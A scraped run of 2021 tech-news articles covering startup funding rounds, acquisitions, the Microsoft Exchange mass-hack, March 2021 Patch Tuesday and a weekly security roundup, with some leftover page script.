Wefarm adds $11M to expand its network for independent farmers, now at 2.5M users

The vast majority of startups remain focused on consumers, knowledge workers and the opportunities to provide services to those that are already operating completely, or at least partially, in digital environments. But today comes news of funding for a startup building a social network for what is probably one of the least digital business sectors of all: independent, small-hold farmers in the developing world.

Wefarm, a social networking platform aimed at independent farmers to help them meet each other, exchange ideas and get advice, and sell or trade equipment and supplies, has raised $11 million funding to continue expanding its business, which now has 2.5 million users.

To put that number and the growth opportunity into some perspective, Wefarm estimates there are some 400 million small-hold farmers globally, with a large proportion of them in developing markets.

The funding, an extension to the company’s 2019 Series A, is being led by Octopus Ventures. True Ventures (which led the 2019 round), Rabo Frontier Ventures, LocalGlobe, June Fund and AgFunder also participated. Wefarm has raised $32 million since being founded in 2015.

To date, London-based Wefarm has primarily found traction in countries in East Africa. Its service is available via a website, but most of its users are accessing without any internet use at all, via the company’s SMS interface. The SMS format has now hosted more than 37 million conversations from farmers engaging in around 400 different types of farming (from livestock or dairy to grains and fruits and vegetables) and $29 million in marketplace sales, the company said.

But rolling out SMS services can be slow, in part because it requires Wefarm to strike local deals with carriers over data usage. (That has also meant that the company has tightly controlled growth: if you go to the main site, you’ll see that you can either join a waitlist or join by way of an invitation from an existing member.)

Kenny Ewan, Wefarm’s founder and CEO, said this latest tranche of funding in part will be used to roll out an app (currently in beta) that will help it launch in more countries and pick up more farmers.

“The big step we’re taking is going from SMS to a digital, app-based service, which will remove the digital barrier,” he said in an interview. “We compare it to the shift from sending DVDs in the mail to streaming video online. We feel like the time is right and believe it could take us to the 100 million mark of users.”

From pandemics to locust plagues

Wefarm’s role in helping link up independent farmers — traditionally and by its nature one of the most analog of industries — has taken on an interesting profile particularly in the last year.

The COVID-19 pandemic has thrown a stark light on a number of digital divides in the world, and one of the most distinctive has been in the wider world of business. Entrepreneurs, companies and organizations that had digital strategies in place could hit the ground running to adapt to a “new normal,” with less physical interaction. Those that did not had to scramble to get there to avoid a nosedive in activity.

Wefarm was around for years before the COVID-19 pandemic, and in some regards it has always been championing and giving a digital voice to the underdogs.

The wider agricultural industry — globally a multi-trillion-dollar enterprise, accounting for up to 25% of GDP in some markets — has undergone some significant digital transformation, but that has been focused on tools and other technology for the agribusiness sector, which includes the giant conglomerates and multinationals like Cargill, Archer-Daniels-Midland, Bayer (Monsanto’s parent), John Deere and others.

Wefarm’s importance (and often singular presence) as a tool for independent farmers to communicate, trade and generally network with others like them was already playing out before COVID-19. When we covered the company’s previous raise in 2019 (the first part of its Series A, a $13 million round) it had already grown to 1.9 million members. And, as it happens, for many of its users, COVID-19 was in some regards the least of their concerns:

“In reality a lot of people in rural Africa were concerned about the weather, or the effect of a locust plague,” Ewan said. “What we saw was traffic around not COVID, but these topics. They had different preoccupations.”

But the pandemic has had an impact, nevertheless. On the platform itself, as we saw in other e-commerce scenarios, Wefarm emerged as an essential service for trading at a time when in-person meetings were halted. As for Wefarm as a business, Ewan said that it essentially meant that the company’s country expansion plans had completely halted mainly because business development teams could no longer travel as they had before: another reason why launching an app could be a useful growth tool.

(That lack of travel was also potentially helpful to Wefarm: despite that the company still managed to grow by 600,000 more users, Ewan pointed out, underscoring a clear demand for the service among its target audience.)

Going forward, there are other ways in which Wefarm aims to leverage its user base, its network and the data that it potentially can amass from them.

“We see the possibility of providing more analytics and data. Our users want that very much,” Ewan said. “We now know more about small-scale farmers than anyone else, because they talk to us.” Areas that Wefarm is considering to develop over the next two years are whether it can help provide more insight into more workable business models, pricing models and more data on particular aspects like ripening periods.

“By building a highly engaged community of millions of small-holder farmers, Wefarm has created a powerful platform providing greater access to vital knowledge and information, which allows farmers to unlock greater economic potential from their land,” said Kamran Adle, early-stage investor at Octopus Ventures. “In practice that might mean understanding which fertilisers work best, what the market price is for certain goods, or new farming techniques that result in better yields, all of which can make a significant difference to livelihoods. It’s also an enormous market with more than 400 million small-holder farmers globally who collectively spend around $400 billion on farming inputs. There is a huge opportunity for Kenny and the team at Wefarm to achieve incredible scale and we’re excited for the launch of its digital platform which will further accelerate growth.”

Dropbox to acquire secure document sharing startup DocSend for $165M

Dropbox announced today that it plans to acquire DocSend for $165 million. The company helps customers share and track documents by sending a secure link instead of an attachment.

“We’re announcing that we’re acquiring DocSend to help us deliver an even broader set of tools for remote work, and DocSend helps customers securely manage and share their business-critical documents, backed by powerful engagement analytics,” Dropbox CEO Drew Houston told me.

When combined with the electronic signature capability of HelloSign, which Dropbox acquired in 2019, the acquisition gives the company an end-to-end document-sharing workflow it had been missing. “Dropbox, DocSend and HelloSign will be able to offer a full suite of self-serve products to help our millions of customers manage the entire critical document workflows and give more control over all aspects of that,” Houston explained.

Houston and DocSend co-founder and CEO Russ Heddleston have known each for other years, and have an established relationship. In fact, Heddleston worked for Dropbox as a summer in intern in 2010. He even ran the idea for the company by Houston prior to launching in 2013, who gave it his seal of approval, and the two companies have been partners for some time.

“We’ve just been following the thread of external sending, which has just kind of evolved and opened up into all these different workflows. And it’s just really interesting that by just being laser-focused on that we’ve been able to create a really differentiated product that users love a ton,” Heddleston said.

Those workflows include creative, sales, client services or startups using DocSend to deliver proposals or pitch decks and track engagement. In fact, among the earliest use cases for the company was helping startups track engagement with their pitch decks at VC firms.

The company raised a modest amount of the money along the way, just $15.3 million, according to Crunchbase, but Heddleston says that he wanted to build a company that was self-sufficient and raising more VC dollars was never a priority or necessity. “We had [VCs] chase us to give us more money all the time, and what we would tell our employees is that we don’t keep count based on money raised or headcount. It’s just about building a great company,” he said.

That builder’s attitude was one of the things that attracted Houston to the company. “We’re big believers in the model of product growth and capital efficiency, and building really intuitive products that are viral, and that’s a lot of what what attracted us to DocSend,” Houston said. While DocSend has 17,000 customers, Houston says the acquisition gives the company the opportunity to get in front of a much larger customer base as part of Dropbox.

It’s worth noting that Box offers a similar secure document-sharing capability enabling users to share a link instead of using an attachment. It recently bought e-signature startup SignRequest for $55 million with an eye toward building more complex document workflows similar to what Dropbox now has with HelloSign and DocSend. PandaDoc is another competitor in this space.

Both Dropbox and DocSend participated in the TechCrunch Disrupt Battlefield, with Houston debuting Dropbox in 2008 at the TechCrunch 50, the original name of the event. Meanwhile, DocSend participated in 2014 at TechCrunch Disrupt in New York City.

DocSend’s approximately 50 employees will be joining Dropbox when the deal closes, which should happen soon, subject to standard regulatory oversight.

Entertainment payroll startup Wrapbook raises $27M round led by a16z

Wrapbook, a startup that simplifies the payroll process for TV, film and commercial productions, has raised $27 million in Series A funding from noteworthy names in both the tech and entertainment worlds.

The round was led by Andreessen Horowitz, with participation from Equal Ventures and Uncork Capital, as well as from WndrCo (the investment and holding company led by DreamWorks and Quibi founder/co-founder Jeffrey Katzenberg) and from CAA co-founder Michael Ovitz.

“It’s time we bring production financial services into the 21st century,” Katzenberg said in a statement. “We need a technology solution that will address the increasing complexities of production onboarding, pay and insuring cast and crew, only exacerbated by COVID-19, and I believe that Wrapbook delivers.”

Wrapbook co-founder and CEO Ali Javid explained that entertainment payroll has remained a largely old-fashioned, paper-based process, which can be particularly difficult to track as cast and crew move from project to project, up to 30 times in single year. Wrapbook digitizes and simplifies the process — electronically collecting all the forms and signatures needed at the beginning of production, handling payroll itself, creating a dashboard to track payments and also making it easy to obtain the necessary insurance.

Wrapbook founders

Wrapbook founders Cameron Woodward, Ali Javid, Hesham El-Nahhas and Naysawn Naji

Although the startup was founded in 2018, Javid told me that demand has increased dramatically as production resumed during the pandemic, with COVID-19 “totally” changing the industry’s culture and prompting production companies to say, “Hey, if there’s an easier, faster way to do this from my house, then yeah let’s look at it.”

Javid also described the Wrapbook platform as a “a vertical fintech solution that’s growing really fast in an industry that we understand really well and not many others have thought about.” In fact, he said the company’s revenue grew 7x in 2020.

And while Wrapbook’s direct customers are the production companies, co-founder and CMO Cameron Woodward (who previously worked in filmmaking insurance and commercial production) said that the team has also focused on creating a good experience for the cast and crew who get paid through the platform — a growing number of them (12% thus far) have used their Wrapbook profiles to get paid on multiple productions.

Wrapbook growth chart

Image Credits: Wrapbook

The startup previously raised $3.6 million in seed funding. Looking ahead, Javid and Woodward said that Wrapbook’s solution could eventually be adopted in other project-based industries. But for now, they see plenty of opportunity to continue growing within entertainment alone — they estimated that the industry currently sees $200 billion in annual payments.

“We’re going to double down on what’s working and build things out based on what customers have asked for within entertainment,” Javid said. “To that end, we’re working towards hiring 100 people in the next 12 months.”

Aqua Security raises $135M at a $1B valuation for its cloud native security service

Aqua Security, a Boston- and Tel Aviv-based security startup that focuses squarely on securing cloud-native services, today announced that it has raised a $135 million Series E funding round at a $1 billion valuation. The round was led by ION Crossover Partners. Existing investors M12 Ventures, Lightspeed Venture Partners, Insight Partners, TLV Partners, Greenspring Associates and Acrew Capital also participated. In total, Aqua Security has now raised $265 million since it was founded in 2015.

The company was one of the earliest to focus on securing container deployments. And while many of its competitors were acquired over the years, Aqua remains independent and is now likely on a path to an IPO. When it launched, the industry focus was still very much on Docker and Docker containers. To the detriment of Docker, that quickly shifted to Kubernetes, which is now the de facto standard. But enterprises are also now looking at serverless and other new technologies on top of this new stack.

“Enterprises that five years ago were experimenting with different types of technologies are now facing a completely different technology stack, a completely different ecosystem and a completely new set of security requirements,” Aqua CEO Dror Davidoff told me. And with these new security requirements came a plethora of startups, all focusing on specific parts of the stack.

Image Credits: Aqua Security

What set Aqua apart, Dror argues, is that it managed to 1) become the best solution for container security and 2) realized that to succeed in the long run, it had to become a platform that would secure the entire cloud-native environment. About two years ago, the company made this switch from a product to a platform, as Davidoff describes it.

“There was a spree of acquisitions by CheckPoint and Palo Alto [Networks] and Trend [Micro],” Davidoff said. “They all started to acquire pieces and tried to build a more complete offering. The big advantage for Aqua was that we had everything natively built on one platform. […] Five years later, everyone is talking about cloud-native security. No one says ‘container security’ or ‘serverless security’ anymore. And Aqua is practically the broadest cloud-native security [platform].”

One interesting aspect of Aqua’s strategy is that it continues to bet on open source, too. Trivy, its open-source vulnerability scanner, is the default scanner for GitLab’s Harbor Registry and the CNCF’s Artifact Hub, for example.

“We are probably the best security open-source player there is because not only do we secure from vulnerable open source, we are also very active in the open-source community,” Davidoff said (with maybe a bit of hyperbole). “We provide tools to the community that are open source. To keep evolving, we have a whole open-source team. It’s part of the philosophy here that we want to be part of the community and it really helps us to understand it better and provide the right tools.”

In 2020, Aqua, which mostly focuses on mid-size and larger companies, doubled the number of paying customers and it now has more than half a dozen customers with an ARR of over $1 million each.

Davidoff tells me the company wasn’t actively looking for new funding. Its last funding round came together only a year ago, after all. But the team decided that it wanted to be able to double down on its current strategy and raise sooner than originally planned. ION had been interested in working with Aqua for a while, Davidoff told me, and while the company received other offers, the team decided to go ahead with ION as the lead investor (with all of Aqua’s existing investors also participating in this round).

“We want to grow from a product perspective, we want to grow from a go-to-market [perspective] and expand our geographical coverage — and we also want to be a little more acquisitive. That’s another direction we’re looking at because now we have the platform that allows us to do that. […] I feel we can take the company to great heights. That’s the plan. The market opportunity allows us to dream big.”

 

Warning the World of a Ticking Time Bomb

Globally, hundreds of thousand of organizations running Exchange email servers from Microsoft just got mass-hacked, including at least 30,000 victims in the United States. Each hacked server has been retrofitted with a “web shell” backdoor that gives the bad guys total, remote control, the ability to read all email, and easy access to the victim’s other computers. Researchers are now racing to identify, alert and help victims, and hopefully prevent further mayhem.

On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups.

Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as “Stage 2,” when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.

But that rescue effort has been stymied by the sheer volume of attacks on these Exchange vulnerabilities, and by the number of apparently distinct hacking groups that are vying for control over vulnerable systems.

A security expert who has briefed federal and military advisors on the threat says many victims appear to have more than one type of backdoor installed. Some victims had three of these web shells installed. One was pelted with eight distinct backdoors. This initially caused a major overcount of potential victims, and required a great deal of de-duping various victim lists.

The source, who spoke on condition of anonymity, said many in the cybersecurity community recently saw a large spike in attacks on thousands of Exchange servers that was later linked to a profit-motivated cybercriminal group.

“What we thought was Stage 2 actually was one criminal group hijacking like 10,000 exchange servers,” said one source who’s briefed U.S. national security advisors on the outbreak.

On Mar. 2, when Microsoft released updates to plug the four Exchange flaws being attacked, it attributed the hacking activity to a previously unidentified Chinese cyber espionage group it called “Hafnium.” Microsoft said Hafnium had been using the Exchange flaws to conduct a series of low-and-slow attacks against specific strategic targets, such as non-governmental organization (NGOs) and think tanks.

But by Feb. 26, that relatively stealthy activity was morphing into the indiscriminate mass-exploitation of all vulnerable Exchange servers. That means even Exchange users that patched the same day Microsoft released security updates may have had servers seeded with backdoors.

Many experts who spoke to KrebsOnSecurity said they believe different cybercriminal groups somehow learned of Microsoft’s plans to ship fixes for the Exchange flaws a week earlier than they’d hoped (Microsoft originally targeted today, Patch Tuesday, as the release date).

The vulnerability scanning activity also ramped up markedly after Microsoft released its updates on Mar. 2. Security researchers love to tear apart patches for clues about the underlying security holes, and one major concern is that various cybercriminal groups may have already worked out how to exploit the flaws independently.

AVERTING MASS-RANSOMWARE

Security experts now are desperately trying to reach tens of thousands of victim organizations with a single message: Whether you have patched yet or have been hacked, backup any data stored on those servers immediately.

Every source I’ve spoken with about this incident says they fully expect profit-motivated cybercriminals to pounce on victims by mass-deploying ransomware. Given that so many groups now have backdoor web shells installed, it would be trivial to unleash ransomware on the lot of them in one go. Also, compromised Exchange servers can be a virtual doorway into the rest of the victim’s network.

“With the number of different threat actors dropping [web] shells on servers increasing, ransomware is inevitable,” said Allison Nixon, chief research officer at Unit221B, a New York City-based cyber investigations firm.

So far there are no signs of victims of this mass-hack being ransomed. But that may well change if the exploit code used to break into these vulnerable Exchange servers goes public. And nobody I’ve interviewed seems to think working exploit code is going to stay unpublished for much longer.

When that happens, the exploits will get folded into publicly available exploit testing kits, effectively making it simple for any attacker to find and compromise a decent number of victims who haven’t already patched.

CHECK MY OWA

Nixon is part of a group of security industry leaders who are contributing data and time to a new victim notification platform online called Check My OWA (Outlook Web Access, the Internet-facing Web component of Exchange Server machines).

Checkmyowa.unit221b.com checks if your Exchange Server domain showed up in attack logs or lists of known-compromised domains.

Perhaps it’s better to call it a self-notification service that is operated from Unit221B’s own web site. Enter an email address at Check My OWA, and if that address matches a domain name for a victim organization, that email address will get a notice.

“Our goal is to motivate people who we might otherwise have never been able to contact,” Nixon said. “My hope is if this site can get out there, then there’s a chance some victim companies are notified and take action or can get att

If the email’s domain name (anything to the right of the @ sign) is detected in their database, the site will send that user an email stating that is has observed the email domain in a list of targeted domains.

“Malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” reads one of the messages to victims. “We strongly recommend saving an offline backup of your Exchange server’s emails immediately, and refer back to the site for additional information on patching and remediation.”

“We have observed your e-mail domain appears in our list of domains the malicious actors were able to successfully compromise, and some of this information suggested they may have been able to install a webshell on an Exchange server associated with this domain,” is another message the site may return.

Nixon said Exchange users can save themselves a potentially nightmarish scenario if they just back up any affected systems now. And given the number of adversaries currently attacking still-unpatched Exchange systems, there is almost no way this won’t end in disaster for at least some victims.

“There are researchers running honeypots to [attract] attacks from different groups, and those honeypots are getting shelled left and right,” she said. “The sooner they can run a backup, the better. This can help save a lot of heartache.”

Oh, and one more important thing: You’ll want to keep any backups disconnected from everything. Ransomware has a tendency to infect everything it can, so make sure at least one backup is stored completely offline.

“Just disconnect them from a computer, put them in a safe place and pray you don’t need them,” Nixon said.

Microsoft Patch Tuesday, March 2021 Edition

On the off chance you were looking for more security to-dos from Microsoft today…the company released software updates to plug more than 82 security flaws in Windows and other supported software. Ten of these earned Microsoft’s “critical” rating, meaning they can be exploited by malware or miscreants with little or no help from users.

Top of the heap this month (apart from the ongoing, global Exchange Server mass-compromise) is a patch for an Internet Explorer bug that is seeing active exploitation. The IE weakness — CVE-2021-26411 — affects both IE11 and newer EdgeHTML-based versions, and it allows attackers to run a file of their choice by getting you to view a hacked or malicious website in IE.

The IE flaw is tied to a vulnerability that was publicly disclosed in early February by researchers at ENKI who claim it was one of those used in a recent campaign by nation-state actors to target security researchers. In the ENKI blog post, the researchers said they will publish proof-of-concept (PoC) details after the bug has been patched.

“As we’ve seen in the past, once PoC details become publicly available, attackers quickly incorporate those PoCs into their attack toolkits,” said Satnam Narang, staff research engineer at Tenable. “We strongly encourage all organizations that rely on Internet Explorer and Microsoft Edge (EdgeHTML-Based) to apply these patches as soon as possible.”

This is probably a good place to quote Ghacks.net’s Martin Brinkman: This is the last patch hurrah for the legacy Microsoft Edge web browser, which is being retired by Microsoft.

For the second month in a row, Microsoft has patched scary flaws in the DNS servers on Windows Server 2008 through 2019 versions that could be used to remotely install software of the attacker’s choice. All five of the DNS bugs quashed in today’s patch batch earned a CVSS Score (danger metric) of 9.8 — almost as bad as it gets.

“There is the outside chance this could be wormable between DNS servers,” warned Trend Micro’s Dustin Childs.

As mentioned above, hundreds of thousands of organizations are in the midst dealing with a security nightmare after having their Exchange Server and Outlook Web Access (OWA) hacked and retrofitted with a backdoor. If an organization you know has been affected by this attack, please have them check with the new victim notification website mentioned in today’s story.

Susan Bradley over at Askwoody.com says “nothing in the March security updates (besides the Exchange ones released last week) is causing me to want to urge you to go running to your machines and patch at this time.” I’d concur, unless of course you cruise the web with older Microsoft browsers.

It’s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it’s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.

But before you update, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

Additional reading:

Martin Brinkman’s always comprehensive take.

The SANS Internet Storm Center no-frills breakdown of the fixes.

 

McAfee sells enterprise biz to Symphony Technology Group for $4B

Security firm McAfee announced this morning that it will be selling its enterprise business to a consortium led by the private equity firm Symphony Technology Group for $4 billion.

It should pair well with RSA, another enterprise-focused security company the private equity firm purchased last February for $2 billion.

McAfee President and Chief Executive Officer Peter Leav says that his company has decided to direct the firm’s resources to the consumer side of the business. “This transaction will allow McAfee to singularly focus on our consumer business and to accelerate our strategy to be a leader in personal security for consumers,” he said in a statement.

The company has been making some moves in the last year, returning to the public markets after a decade as a private company. In January, the company reportedly laid off a couple of hundred employees and shut down its software development center in Tel Aviv.

Although Symphony did not point directly to the RSA acquisition, the two investments create a large combined legacy security business for the firm, both of which have strong brand recognition, but might have lost some of their edge to more modern competitors in the marketplace.

Looking at McAfee’s latest earning’s report, Q42020, which the company reported on February 24, 2021, the consumer business grew at a much brisker rate than the enterprise side of the house. The former was up 23% YoY, while the latter grew at a far slower 5% rate.

As for the entire year, the company reported $2.9 billion in total FY2020 revenue, up 10% YoY. That broke down to $1.6 billion in consumer net revenue up 20% YoY, and $1.3 billion in enterprise net revenue, an increase of just 1% for the full year.

The company has a complex history, starting life in the 1980s selling firewall software. It eventually went public before being purchased by Intel for $7.7 billion in 2010 and going private again. In 2014, the company changed names to Intel Security before Intel sold a majority stake to TPG in 2017 for $4.2 billion and changed the name back to McAfee.

The transaction is expected to close by the end of this year, subject to regulatory oversight.


Early Stage is the premier “how-to” event for startup entrepreneurs and investors. You’ll hear firsthand how some of the most successful founders and VCs build their businesses, raise money and manage their portfolios. We’ll cover every aspect of company building: Fundraising, recruiting, sales, product-market fit, PR, marketing and brand building. Each session also has audience participation built-in — there’s ample time included for audience questions and discussion.

( function() {
var func = function() {
var iframe = document.getElementById(‘wpcom-iframe-dde292b93a5f3017145419dd51bb9fce’)
if ( iframe ) {
iframe.onload = function() {
iframe.contentWindow.postMessage( {
‘msg_type’: ‘poll_size’,
‘frame_id’: ‘wpcom-iframe-dde292b93a5f3017145419dd51bb9fce’
}, “https://tcprotectedembed.com” );
}
}

// Autosize iframe
var funcSizeResponse = function( e ) {

var origin = document.createElement( ‘a’ );
origin.href = e.origin;

// Verify message origin
if ( ‘tcprotectedembed.com’ !== origin.host )
return;

// Verify message is in a format we expect
if ( ‘object’ !== typeof e.data || undefined === e.data.msg_type )
return;

switch ( e.data.msg_type ) {
case ‘poll_size:response’:
var iframe = document.getElementById( e.data._request.frame_id );

if ( iframe && ” === iframe.width )
iframe.width = ‘100%’;
if ( iframe && ” === iframe.height )
iframe.height = parseInt( e.data.height );

return;
default:
return;
}
}

if ( ‘function’ === typeof window.addEventListener ) {
window.addEventListener( ‘message’, funcSizeResponse, false );
} else if ( ‘function’ === typeof window.attachEvent ) {
window.attachEvent( ‘onmessage’, funcSizeResponse );
}
}
if (document.readyState === ‘complete’) { func.apply(); /* compat for infinite scroll */ }
else if ( document.addEventListener ) { document.addEventListener( ‘DOMContentLoaded’, func, false ); }
else if ( document.attachEvent ) { document.attachEvent( ‘onreadystatechange’, func ); }
} )();

A Basic Timeline of the Exchange Mass-Hack

Sometimes when a complex story takes us by surprise or knocks us back on our heels, it pays to revisit the events in a somewhat linear fashion. Here’s a brief timeline of what we know leading up to last week’s mass-hack, when hundreds of thousands of Microsoft Exchange Server systems got compromised and seeded with a powerful backdoor Trojan horse program.

When did Microsoft find out about attacks on previously unknown vulnerabilities in Exchange?

Pressed for a date when it first became aware of the problem, Microsoft told KrebsOnSecurity it was initially notified “in early January.” So far the earliest known report came on Jan. 5, from a principal security researcher for security testing firm DEVCORE who goes by the handle “Orange Tsai.” DEVCORE is credited with reporting two of the four Exchange flaws that Microsoft patched on Mar. 2.

Reston, Va.-based Volexity first identified attacks on the flaws on Jan. 6, and officially informed Microsoft about it on Feb. 2. Volexity now says it can see attack traffic going back to Jan. 3. Microsoft credits Volexity with reporting the same two Exchange flaws as DEVCORE.

Danish security firm Dubex says it first saw clients hit on Jan. 18, and reported their incident response findings to Microsoft on Jan. 27.

In a blog post on their discovery, Please Leave an Exploit After the Beep, Dubex said the victims it investigated in January had a “web shell” backdoor installed via the “unifying messaging” module, a component of Exchange that allows an organization to store voicemail and faxes along with emails, calendars, and contacts in users’ mailboxes.

“A unified messaging server also allows users access to voicemail features via smartphones, Microsoft Outlook and Outlook Web App,” Dubex wrote. “Most users and IT departments manage their voicemail separately from their email, and voicemail and email exist as separate inboxes hosted on separate servers. Unified Messaging offers an integrated store for all messages and access to content through the computer and the telephone.”

Dubex says Microsoft “escalated” their issue on Feb. 8, but never confirmed the zero-day with Dubex prior to the emergency patch plea on Mar. 2. “We never got a ‘real’ confirmation of the zero-day before the patch was released,” said Dubex’s Chief Technology Officer Jacob Herbst.

How long have the vulnerabilities exploited here been around?

On Mar. 2, Microsoft patched four flaws in Exchange Server 2013 through 2019. Exchange Server 2010 is no longer supported, but the software giant made a “defense in depth” exception and gave Server 2010 users a freebie patch, too. That means the vulnerabilities the attackers exploited have been in the Microsoft Exchange Server code base for more than ten years.

The timeline also means Microsoft had almost two months to push out the patch it ultimately shipped Mar. 2, or else help hundreds of thousands of Exchange customers mitigate the threat from this flaw before attackers started exploiting it indiscriminately.

Here’s a rough timeline as we know it so far:

  • Jan. 5: DEVCORE alerts Microsoft of its findings.
  • Jan. 6: Volexity spots attacks that use unknown vulnerabilities in Exchange.
  • Jan. 8: DEVCORE reports Microsoft had reproduced the problems and verified their findings.
  • Jan. 11: DEVCORE snags proxylogon.com, a domain now used to explain its vulnerability discovery process.
  • Jan. 27: Dubex alerts Microsoft about attacks on a new Exchange flaw.
  • Jan. 29: Trend Micro publishes a blog post about “Chopper” web shells being dropped via Exchange flaws (but attributes cause as Exchange bug Microsoft patched in 2020)
  • Feb. 2: Volexity warns Microsoft about active attacks on previously unknown Exchange vulnerabilities.
  • Feb. 8: Microsoft tells Dubex it has “escalated” its report internally.
  • Feb. 18: Microsoft confirms with DEVCORE a target date of Mar. 9 (tomorrow) for publishing security updates for the Exchange flaws. That is the second Tuesday of the month — a.k.a. “Patch Tuesday,” when Microsoft releases monthly security updates (and yes that means check back here tomorrow for the always riveting Patch Tuesday roundup).
  • Feb. 26-27: Targeted exploitation gradually turns into a global mass-scan; attackers start rapidly backdooring vulnerable servers.
  • Mar. 2: A week earlier than previously planned, Microsoft releases updates to plug 4 zero-day flaws.
  • Mar. 2: DEVCORE researcher Orange Tsai (noted for finding and reporting some fairly scary bugs in the past) jokes that nobody guessed Exchange as the source of his Jan. 5 tweet about “probably the most serious [remotely exploitable bug] I have ever reported.”
  • Mar. 3: Tens of thousands of Exchange servers compromised worldwide, with thousands more servers getting freshly hacked each hour.
  • Mar. 4: White House National Security Advisor Jake Sullivan tweets about importance of patching Exchange flaws, and how to detect if systems are already compromised.
  • Mar. 5, 1:26 p.m. ET: In live briefing, White House press secretary Jen Paski expresses concern over the size of the attack.
  • Mar. 5, 4:07 p.m. ET: KrebsOnSecurity breaks the news that at least 30,000 organizations in the U.S. — and hundreds of thousands worldwide — now have backdoors installed.
  • Mar. 5, 6:56 p.m. ET: Wired.com confirms the reported number of victims.
  • Mar. 5, 8:04 p.m. ET: Former CISA head Chris Krebs tweets the real victim numbers “dwarf” what’s been reported publicly.
  • Mar. 6: CISA says it is aware of “widespread domestic and international exploitation of Microsoft Exchange Server flaws.”
  • Mar. 7-Present: Security experts continue effort to notify victims, coordinate remediation, and remain vigilant for “Stage 2” of this attack (further exploitation of already-compromised servers).

Update, 12:11 p.m. ET: Correct link to Dubex site (it’s Dubex.dk). Also clarified timing of White House press statement expressing concern over the number of the Exchange Server compromises. Corrected date of Orange Tsai tweet.

The Good, the Bad and the Ugly in Cybersecurity – Week 10

The Good

Are cyberattacks on cyberattackers (aka ‘hacking back’) good news or bad news? While that question elicits mixed responses among security professionals, we can’t help but feel that when darknet criminals start to ask “are darkweb forums safe anymore?” this must be a good thing for the security of the rest of us. This week has seen the latest in a series of attacks on darknet forums where criminals regularly sell malware, credit card details, account credentials and leaked or stolen data.

Mazafuka (aka ‘Maza’) is a darknet criminal forum that’s been around so long many cyber pros were surprised to hear it was still in existence this week, when news broke that the Russian cybercrime forum had been the victim of a hack. Almost 3,000 user records containing user IDs, names, passwords and other social media contact info were leaked, with the latter likely of huge interest to LEAs around the world.

Several weeks previously, another Russian-speaking hacker forum ‘Verified’ was forcibly taken over by unknown intruders. Hacktivists, deep-cover law enforcement or a rival gang are all possibilities, although in a public post the attackers claimed to be “like-minded” and insisted they only wanted to develop and improve the site. Whether the shady users of the site will trust this new enforced management remains to be seen. These attacks followed in the wake of similar hacks on carding forum ‘Club2Crd’ and darknet website ‘Dread’ last month.

If such hacks are disrupting the ability of cyber criminals to profit from their misdeeds, we reckon it’s worth counting as good news. And besides, whether you take pleasure in the bad guys getting a taste of their own medicine or not, it just goes to show you can never take cybersecurity for granted, whichever side of the law you are on.

The Bad

A Chinese APT group that Microsoft have dubbed ‘Hafnium’ (otherwise known as the chemical element Hf) have been fingered for ITW attacks targeting Microsoft Exchange Server, it was revealed this week. The Redwood tech giant was forced to release an out-of-band security update to patch seven vulnerabilities affecting MS Exchange products as old as 2013.

Microsoft said that they were aware of active exploits in the wild leveraging four of the patched vulnerabilities. CISA also released an advisory the following day warning that attackers could use the flaws to gain persistent system access and control of an enterprise network, stating that this “poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action”.

In a separate post, Microsoft said the state-sponsored Hafnium group had been utilizing the zero day vulnerabilities to steal data from U.S. organizations, specifically via CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

SentinelOne has released its own advisory, technical review, IoCs and guidance for SentinelOne customers here.

The Ugly

Nobody expected the hack of the year (decade? century?), aka the SolarWinds breach, to go away anytime soon, and so it’s not entirely a surprise to hear that Microsoft have reported three new strains of malware likely associated with the APT espionage campaign, widely-believed to be of Russian intelligence origin.

In a report yesterday, Microsoft researchers dubbed the three new strains Sibot, GoldFinder and GoldMax (the latter is also being tracked as SUNSHUTTLE by FireEye). While we’re on naming conventions, Microsoft have also chosen to label the APT behind the entire campaign as ‘Nobelium’ (which happens to be a synthetic, radioactive chemical element with the atomic number of 102, in case you were wondering!); the significance of the name choices was not explained.

Sibot refers to three variants of a VBScript that download a malicious DLL from a compromised website, while GoldFinder and GoldMax are both malware tools written in Go (Golang).

GoldFinder appears to be a custom HTTP tracer tool for logging the route a packet takes to reach the attacker’s C2 server. The threat actors can use the tool to identify proxy servers and network security devices, aiding discovery of other potential points of ingress. GoldMax functions as a backdoor and allows the attacker to securely communicate with a C2 and to launch commands on the victim’s device. Comprehensive details and IoCs are available here.

The significance of finding further late-stage malware tools in compromised systems should not be underestimated. The full impact of the SolarWinds breach is still unfolding, and enterprise security teams are encouraged to remain vigilant and proactive in following up on these developments.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Snowflake latest enterprise company to feel Wall Street’s wrath after good quarter

Snowflake reported earnings this week, and the results look strong with revenue more than doubling year-over-year.

However, while the company’s fourth quarter revenue rose 117% to $190.5 million, it apparently wasn’t good enough for investors, who have sent the company’s stock tumbling since it reported Wednesday after the bell.

It was similar to the reaction that Salesforce received from Wall Street last week after it announced a positive earnings report. Snowflake’s stock closed down around 4% today, a recovery compared to its midday lows when it was off nearly 12%.

Why the declines? Wall Street’s reaction to earnings can lean more on what a company will do next more than its most recent results. But Snowflake’s guidance for its current quarter appeared strong as well, with a predicted $195 million to $200 million in revenue, numbers in line with analysts’ expectations.

